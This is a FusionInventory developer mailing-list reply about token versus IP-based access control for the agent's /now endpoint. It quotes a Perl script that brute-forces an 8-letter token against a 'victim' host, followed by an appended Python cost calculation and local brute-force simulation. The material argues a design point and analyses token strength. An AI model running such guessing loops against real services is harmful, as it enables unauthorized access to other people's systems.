On 04/03/2013 10:46, David DURIEUX wrote:
On Mon, 04 Mar 2013 10:43:44 +0100
Guillaume Rousse <[email protected]> wrote:

On 04/03/2013 08:40, David DURIEUX wrote:
For security reasons, having a token is safer, and I prefer to have a
token rather than allowing the IP of the server.
Prove it.

It's more difficult to have the right token (regenerated at each
execution of the agent) than to have a computer with the IP of the trusted
server.
Welcome to the real world.

#!/usr/bin/perl
# Brute-force the 8-uppercase-letter token accepted by the agent's /now URL:
# 26 ** 8 candidates, one HTTP request each, stop at the first accepted one.
use strict;
use warnings;
use LWP::UserAgent;

my @alphabet = 'A' .. 'Z';
my $ua = LWP::UserAgent->new(timeout => 5);

foreach my $a (@alphabet) {
  foreach my $b (@alphabet) {
    foreach my $c (@alphabet) {
      foreach my $d (@alphabet) {
        foreach my $e (@alphabet) {
          foreach my $f (@alphabet) {
            foreach my $g (@alphabet) {
              foreach my $h (@alphabet) {
                my $token = "$a$b$c$d$e$f$g$h";
                my $res = $ua->get("http://victim:62354/now?token=$token");
                if ($res->is_success) {
                  print "look ma, I brute-forced the token: $token\n";
                  exit 0;
                }
              }
            }
          }
        }
      }
    }
  }
}

On the other hand, the capacity to spoof an IP address is highly dependent on the local network configuration.

My point is just that both solutions are insecure in different ways, with the token solution more cumbersome to implement. Given that there are actually very few things an attacker would gain by defeating this protection anyway, let's keep it simple and stupid.

--
BOFH excuse #338:

old inkjet cartridges emanate barium-based fumes

_______________________________________________
Fusioninventory-devel mailing list
[email protected]
http://lists.alioth.debian.org/cgi-bin/mailman/listinfo/fusioninventory-devel
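To put numbers on the exchange above (the nested-loop brute force against an 8-uppercase-letter token, and David's point that the token is regenerated at each agent run), here is an added example that is not FusionInventory code and not from either poster. It generalises the eight nested foreach loops with itertools.product, plays the role of the /now token check with a local stand-in (constant-time compare, fresh random token), and computes how long an online guessing attack takes for a given alphabet, length and request rate. The 26-letter alphabet, length 8, port 62354 and /now path are the thread's; the request rate of 1000 requests per second and the local TokenGate class are assumptions made here for the calculation.

```python
"""Brute-force cost of a fixed-length token, plus a local stand-in for the
agent's token check.  Added illustration, not project code.  The request
rate and the TokenGate class are assumptions; alphabet and length follow
the thread's Perl loops ('A'..'Z', 8 characters)."""
import hmac
import itertools
import math
import secrets

SECONDS_PER_YEAR = 365.25 * 24 * 3600


def keyspace(alphabet_size: int, length: int) -> int:
    """Number of distinct tokens the nested loops can visit: alphabet ** length."""
    return alphabet_size ** length


def entropy_bits(alphabet_size: int, length: int) -> float:
    """Same keyspace expressed in bits, for comparison with e.g. a 128-bit token."""
    return length * math.log2(alphabet_size)


def expected_years(alphabet_size: int, length: int, requests_per_second: float,
                   regenerated_per_guess: bool = False) -> float:
    """Expected wall-clock time of an online guessing attack.

    Exhaustive search of a fixed token succeeds after (N+1)/2 guesses on
    average.  If the token is regenerated before every guess (the extreme
    reading of 'regenerated at each execution of the agent'), earlier
    guesses are never excluded: each guess is an independent 1/N trial
    and the expected number of guesses rises to N."""
    n = keyspace(alphabet_size, length)
    guesses = n if regenerated_per_guess else (n + 1) / 2
    return guesses / requests_per_second / SECONDS_PER_YEAR


class TokenGate:
    """Assumed stand-in for the /now?token= check: random token, constant-time compare."""

    def __init__(self, alphabet: str, length: int):
        self.alphabet = alphabet
        self.length = length
        self.attempts = 0
        self.regenerate()

    def regenerate(self) -> None:
        # secrets draws from the OS CSPRNG; random.choice would be guessable.
        self.token = "".join(secrets.choice(self.alphabet) for _ in range(self.length))

    def check(self, presented: str) -> bool:
        self.attempts += 1
        # compare_digest does not stop at the first mismatching byte, so the
        # response time does not leak how much of the prefix was right.
        return hmac.compare_digest(presented.encode(), self.token.encode())


def brute_force(gate: TokenGate, alphabet: str, length: int):
    """The thread's eight nested foreach loops, for any alphabet and length."""
    for chars in itertools.product(alphabet, repeat=length):
        candidate = "".join(chars)
        if gate.check(candidate):  # one HTTP GET to http://victim:62354/now in the real attack
            return candidate
    return None


if __name__ == "__main__":
    rate = 1000.0  # assumed requests per second against the agent
    for name, size, length in (("8 uppercase letters", 26, 8),
                               ("16 hex chars (64 bits)", 16, 16),
                               ("32 hex chars (128 bits)", 16, 32)):
        print(f"{name}: {entropy_bits(size, length):.1f} bits, "
              f"{expected_years(size, length, rate):.3g} years fixed, "
              f"{expected_years(size, length, rate, True):.3g} years if regenerated per guess")
    # Tiny keyspace so the simulated attack finishes instantly.
    gate = TokenGate("AB", 3)
    found = brute_force(gate, "AB", 3)
    print(f"found {found!r} after {gate.attempts} of {keyspace(2, 3)} guesses")
```

Run as a script it prints the cost table and the toy attack; the functions are importable so the same arithmetic can be applied to whatever token format and request rate an agent actually faces.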
